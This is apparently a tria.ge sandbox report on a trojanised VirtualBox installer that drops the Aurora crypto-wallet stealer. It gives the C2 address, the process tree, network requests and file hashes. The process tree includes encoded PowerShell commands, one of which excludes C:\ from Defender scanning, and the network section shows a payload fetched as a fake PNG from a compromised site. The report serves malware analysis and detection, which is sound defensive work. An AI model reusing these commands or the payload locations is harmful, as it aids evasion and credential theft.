Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    172s
  • max time network
    188s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/12/2022, 17:16 UTC

General

  • Target

    VirtualBox-7.0.2-154219-Win/VirtualBox-7.0.2-154219-Win.exe

  • Size

    677.9MB

  • MD5

    670e50d1d17dce3d446919680dd657f0

  • SHA1

    fdbba6ab2df85337f8fefec7da04323ba6e42107

  • SHA256

    7f43dee28fdf815aca5367694540bcd514c2ad9c1a4c4bc645286403fffb4123

  • SHA512

    ed31879ce1867b31b9f0868ff797ec92dfb5284381bada666636ff07eb9b4221f60a9fb549984d0b3272e619674031431c7498451ded735ad98de4db5a53e2ba

  • SSDEEP

    3072:eahKyd2n31yS5LvfiP1yaX3KmC5wBCgBCwfjL1c1pcSsP1XBRWf9z:eahOcnHn9BF//1cUJU

Malware Config

Extracted

Family

aurora

C2

79.137.206.138:8081

Signatures

  • Aurora

    Aurora is a crypto wallet stealer written in Golang.

  • Executes dropped EXE 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\VirtualBox-7.0.2-154219-Win\VirtualBox-7.0.2-154219-Win.exe
    "C:\Users\Admin\AppData\Local\Temp\VirtualBox-7.0.2-154219-Win\VirtualBox-7.0.2-154219-Win.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3596
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA1AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:644
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4740
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4656
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:4588
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          wmic os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3396
        • C:\Windows\SysWOW64\cmd.exe
          cmd /C "wmic path win32_VideoController get name"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3528
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4304
        • C:\Windows\SysWOW64\cmd.exe
          cmd /C "wmic cpu get name"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1812
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic cpu get name
            5⤵
              PID:3676

    Network

    • flag-unknown
      DNS
      wyndellribeiro.com.br
      BUSINE~3.EXE
      Remote address:
      8.8.8.8:53
      Request
      wyndellribeiro.com.br
      IN A
      Response
      wyndellribeiro.com.br
      IN A
      162.241.203.136
    • flag-unknown
      GET
      https://wyndellribeiro.com.br/wp-admin/images/bo/Hsujyzmg.png
      BUSINE~3.EXE
      Remote address:
      162.241.203.136:443
      Request
      GET /wp-admin/images/bo/Hsujyzmg.png HTTP/1.1
      Host: wyndellribeiro.com.br
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 15 Dec 2022 17:18:21 GMT
      Server: Apache
      Upgrade: h2,h2c
      Connection: Upgrade, Keep-Alive
      Last-Modified: Thu, 08 Dec 2022 16:53:59 GMT
      Accept-Ranges: bytes
      Content-Length: 3319296
      Keep-Alive: timeout=5, max=75
      Content-Type: image/png
    • flag-unknown
      DNS
      164.2.77.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      164.2.77.40.in-addr.arpa
      IN PTR
      Response
    • 104.18.10.207:443
      tls
      138 B
      183 B
      3
      3
    • 104.18.7.145:443
      tls
      92 B
      143 B
      2
      2
    • 93.184.220.29:80
      322 B
      7
    • 20.189.173.10:443
      322 B
      7
    • 8.238.110.126:80
      322 B
      7
    • 162.241.203.136:443
      https://wyndellribeiro.com.br/wp-admin/images/bo/Hsujyzmg.png
      tls, http
      BUSINE~3.EXE
      102.4kB
      3.4MB
      1696
      2468

      HTTP Request

      GET https://wyndellribeiro.com.br/wp-admin/images/bo/Hsujyzmg.png

      HTTP Response

      200
    • 79.137.206.138:8081
      BUSINE~3.EXE
      1.0MB
      8.3kB
      767
      207
    • 8.8.8.8:53
      wyndellribeiro.com.br
      dns
      BUSINE~3.EXE
      67 B
      83 B
      1
      1

      DNS Request

      wyndellribeiro.com.br

      DNS Response

      162.241.203.136

    • 8.8.8.8:53
      164.2.77.40.in-addr.arpa
      dns
      70 B
      144 B
      1
      1

      DNS Request

      164.2.77.40.in-addr.arpa

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      1KB

      MD5

      6195a91754effb4df74dbc72cdf4f7a6

      SHA1

      aba262f5726c6d77659fe0d3195e36a85046b427

      SHA256

      3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5

      SHA512

      ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

      Filesize

      53KB

      MD5

      06ad34f9739c5159b4d92d702545bd49

      SHA1

      9152a0d4f153f3f40f7e606be75f81b582ee0c17

      SHA256

      474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

      SHA512

      c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      4bb93f9fe7158d24597b3a06abbe2994

      SHA1

      5f2cb8edd8f2714059f13d24b7bf84c45d1681aa

      SHA256

      427f3eb6d3c11be4c6d4fe96196c972488d53cc84753580223132f8e7ef09d00

      SHA512

      163fb53001b3677fc57f8877eb241cab73e09cb17c6964fa1560639f7f98cfb6d3e78ae7233f892ba443325678b3e2242179ae1d168ce0e7504f91d9f94ca129

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE

      Filesize

      362.6MB

      MD5

      b57fd565047f69ed9031fe35607bc4de

      SHA1

      a34dcacc6f1915d500d8643a5e9e9b23f6c2eec1

      SHA256

      e7297f5162728d2282bd88f80583bd88d3075f0fbabd7568014a40e856aaa81a

      SHA512

      d9917bf7b8b396324cd0f77335b2fc8b5022376d646c06846e0a6c9f0908e5d4030443188913d6a9e0b1f6f763d8c9330c74d33edb55ee59690a2b5eabb64cd4

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE

      Filesize

      362.6MB

      MD5

      b57fd565047f69ed9031fe35607bc4de

      SHA1

      a34dcacc6f1915d500d8643a5e9e9b23f6c2eec1

      SHA256

      e7297f5162728d2282bd88f80583bd88d3075f0fbabd7568014a40e856aaa81a

      SHA512

      d9917bf7b8b396324cd0f77335b2fc8b5022376d646c06846e0a6c9f0908e5d4030443188913d6a9e0b1f6f763d8c9330c74d33edb55ee59690a2b5eabb64cd4

    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUSINE~3.EXE

      Filesize

      362.6MB

      MD5

      b57fd565047f69ed9031fe35607bc4de

      SHA1

      a34dcacc6f1915d500d8643a5e9e9b23f6c2eec1

      SHA256

      e7297f5162728d2282bd88f80583bd88d3075f0fbabd7568014a40e856aaa81a

      SHA512

      d9917bf7b8b396324cd0f77335b2fc8b5022376d646c06846e0a6c9f0908e5d4030443188913d6a9e0b1f6f763d8c9330c74d33edb55ee59690a2b5eabb64cd4

    • memory/644-144-0x0000000005200000-0x0000000005266000-memory.dmp

      Filesize

      408KB

    • memory/644-147-0x0000000006330000-0x000000000634A000-memory.dmp

      Filesize

      104KB

    • memory/644-141-0x0000000002540000-0x0000000002576000-memory.dmp

      Filesize

      216KB

    • memory/644-142-0x0000000005340000-0x0000000005968000-memory.dmp

      Filesize

      6.2MB

    • memory/644-143-0x0000000005120000-0x0000000005186000-memory.dmp

      Filesize

      408KB

    • memory/644-146-0x0000000007500000-0x0000000007B7A000-memory.dmp

      Filesize

      6.5MB

    • memory/644-145-0x0000000005E40000-0x0000000005E5E000-memory.dmp

      Filesize

      120KB

    • memory/3596-138-0x00000000058D0000-0x00000000058DA000-memory.dmp

      Filesize

      40KB

    • memory/3596-139-0x0000000008FD0000-0x0000000008FF2000-memory.dmp

      Filesize

      136KB

    • memory/3596-137-0x0000000005950000-0x00000000059E2000-memory.dmp

      Filesize

      584KB

    • memory/3596-136-0x0000000005F00000-0x00000000064A4000-memory.dmp

      Filesize

      5.6MB

    • memory/3596-135-0x0000000000F00000-0x0000000000F40000-memory.dmp

      Filesize

      256KB

    • memory/4588-152-0x0000000000400000-0x0000000000725000-memory.dmp

      Filesize

      3.1MB

    • memory/4588-155-0x0000000000400000-0x0000000000725000-memory.dmp

      Filesize

      3.1MB

    • memory/4588-173-0x0000000000400000-0x0000000000725000-memory.dmp

      Filesize

      3.1MB

    • memory/4588-172-0x0000000000400000-0x0000000000725000-memory.dmp

      Filesize

      3.1MB

    • memory/4588-157-0x0000000000400000-0x0000000000725000-memory.dmp

      Filesize

      3.1MB

    • memory/4656-162-0x0000000006230000-0x000000000624E000-memory.dmp

      Filesize

      120KB

    • memory/4656-163-0x0000000007060000-0x000000000706A000-memory.dmp

      Filesize

      40KB

    • memory/4656-166-0x0000000007290000-0x0000000007326000-memory.dmp

      Filesize

      600KB

    • memory/4656-169-0x0000000005B60000-0x0000000005B6E000-memory.dmp

      Filesize

      56KB

    • memory/4656-170-0x00000000071F0000-0x000000000720A000-memory.dmp

      Filesize

      104KB

    • memory/4656-171-0x00000000071D0000-0x00000000071D8000-memory.dmp

      Filesize

      32KB

    • memory/4656-161-0x00000000754D0000-0x000000007551C000-memory.dmp

      Filesize

      304KB

    • memory/4656-160-0x0000000006250000-0x0000000006282000-memory.dmp

      Filesize

      200KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.